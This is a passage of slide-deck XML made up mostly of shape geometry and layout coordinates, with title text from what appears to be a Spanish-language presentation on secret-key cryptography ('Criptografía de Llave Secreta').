                  <a:pt x="1110521" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110521" y="164183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164183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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6758606" y="1514935"/>
            <a:ext cx="67500" cy="67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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096947" y="1631706"/>
            <a:ext cx="779907" cy="178108"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="516255" w="2260600">
                <a:moveTo>
                  <a:pt x="159366" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2100941" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2131367" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2175889" y="3294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213538" y="17224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2243083" y="46771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257012" y="84429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260186" y="129236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="160068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="356418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2259331" y="411073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2252496" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2229919" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2194477" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2155512" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2100229" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104705" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="410984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="355706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="159366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="104705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="65833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="30389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="7809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104793" y="976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160068" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="0"/>
                </a:lnTo>
                <a:close/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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6160997" y="1692325"/>
            <a:ext cx="383162" cy="56740"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="164464" w="1110615">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1110521" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110521" y="164183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164183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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6758606" y="1686909"/>
            <a:ext cx="67500" cy="67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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096947" y="1806344"/>
            <a:ext cx="779907" cy="178108"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="516255" w="2260600">
                <a:moveTo>
                  <a:pt x="159366" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2100941" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2131367" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2175889" y="3294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213538" y="17224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2243083" y="46771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257012" y="84429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260186" y="129236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="160068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="356418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2259331" y="411073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2252496" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2229919" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2194477" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2155512" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2100229" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104705" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="410984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="355706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="159366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="104705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="65833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="30389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="7809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104793" y="976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160068" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="0"/>
                </a:lnTo>
                <a:close/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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6160997" y="1866966"/>
            <a:ext cx="383162" cy="56740"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="164464" w="1110615">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1110521" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110521" y="164183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164183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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6758606" y="1861551"/>
            <a:ext cx="67500" cy="67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2267147" y="1461054"/>
            <a:ext cx="779907" cy="178108"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="516255" w="2260600">
                <a:moveTo>
                  <a:pt x="159366" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2100941" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2131367" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2175889" y="3294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213538" y="17224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2243083" y="46771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257012" y="84429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260186" y="129236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="160068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="356418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2259331" y="411073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2252496" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2229919" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2194477" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2155512" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2100229" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104705" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="410984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="355706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="159366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="104705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="65833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="30389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="7809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104793" y="976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160068" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="0"/>
                </a:lnTo>
                <a:close/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2331197" y="1521676"/>
            <a:ext cx="383162" cy="56740"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="164464" w="1110615">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1110521" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110521" y="164183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164183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2928806" y="1516260"/>
            <a:ext cx="67500" cy="67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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267147" y="1633031"/>
            <a:ext cx="779907" cy="178108"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="516255" w="2260600">
                <a:moveTo>
                  <a:pt x="159366" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2100941" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2131367" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2175889" y="3294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213538" y="17224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2243083" y="46771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257012" y="84429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260186" y="129236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="160068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="356418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2259331" y="411073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2252496" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2229919" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2194477" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2155512" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2100229" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104705" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="410984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="355706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="159366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="104705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="65833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="30389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="7809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104793" y="976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160068" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="0"/>
                </a:lnTo>
                <a:close/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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2331197" y="1693650"/>
            <a:ext cx="383162" cy="56740"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="164464" w="1110615">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1110521" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110521" y="164183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164183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2928806" y="1688234"/>
            <a:ext cx="67500" cy="67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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267147" y="1807669"/>
            <a:ext cx="779907" cy="178108"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="516255" w="2260600">
                <a:moveTo>
                  <a:pt x="159366" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2100941" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2131367" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2175889" y="3294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213538" y="17224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2243083" y="46771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257012" y="84429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260186" y="129236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="160068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="356418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2259331" y="411073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2252496" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2229919" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2194477" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2155512" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2100229" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104705" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="410984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="355706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="159366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="104705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="65833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="30389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="7809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104793" y="976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160068" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="0"/>
                </a:lnTo>
                <a:close/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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2331197" y="1868291"/>
            <a:ext cx="383162" cy="56740"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="164464" w="1110615">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1110521" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110521" y="164183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164183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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2928806" y="1862876"/>
            <a:ext cx="67500" cy="67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14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="879525" y="1592050"/>
            <a:ext cx="1280400" cy="1113300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8" name="Google Shape;178;p14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1270900" y="1902025"/>
            <a:ext cx="877800" cy="781200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9" name="Google Shape;179;p14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3165525" y="1592050"/>
            <a:ext cx="1194000" cy="601800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0" name="Google Shape;180;p14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3175950" y="1836050"/>
            <a:ext cx="909900" cy="477900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1" name="Google Shape;181;p14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="4765725" y="1592050"/>
            <a:ext cx="1194000" cy="601800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2" name="Google Shape;182;p14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5039400" y="1836050"/>
            <a:ext cx="909900" cy="477900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3" name="Google Shape;183;p14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6975525" y="1592050"/>
            <a:ext cx="1280400" cy="1113300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4" name="Google Shape;184;p14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6986750" y="1902025"/>
            <a:ext cx="877800" cy="781200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Criptografía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 txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311708" y="10587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Criptografía de Llave Secreta</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Google Shape;195;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3292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[Secret-Key Cryptography]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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591532" y="306164"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="4130450" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7228" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7237" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196565" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250210" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294903" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472964" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480182" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472955" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294927" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250404" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197219" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41304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591532" y="306164"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="349738" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4130450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197217" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250400" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294923" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="351298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294899" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250206" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196564" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2495180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17138"/>
                </a:lnTo>
                <a:lnTo>
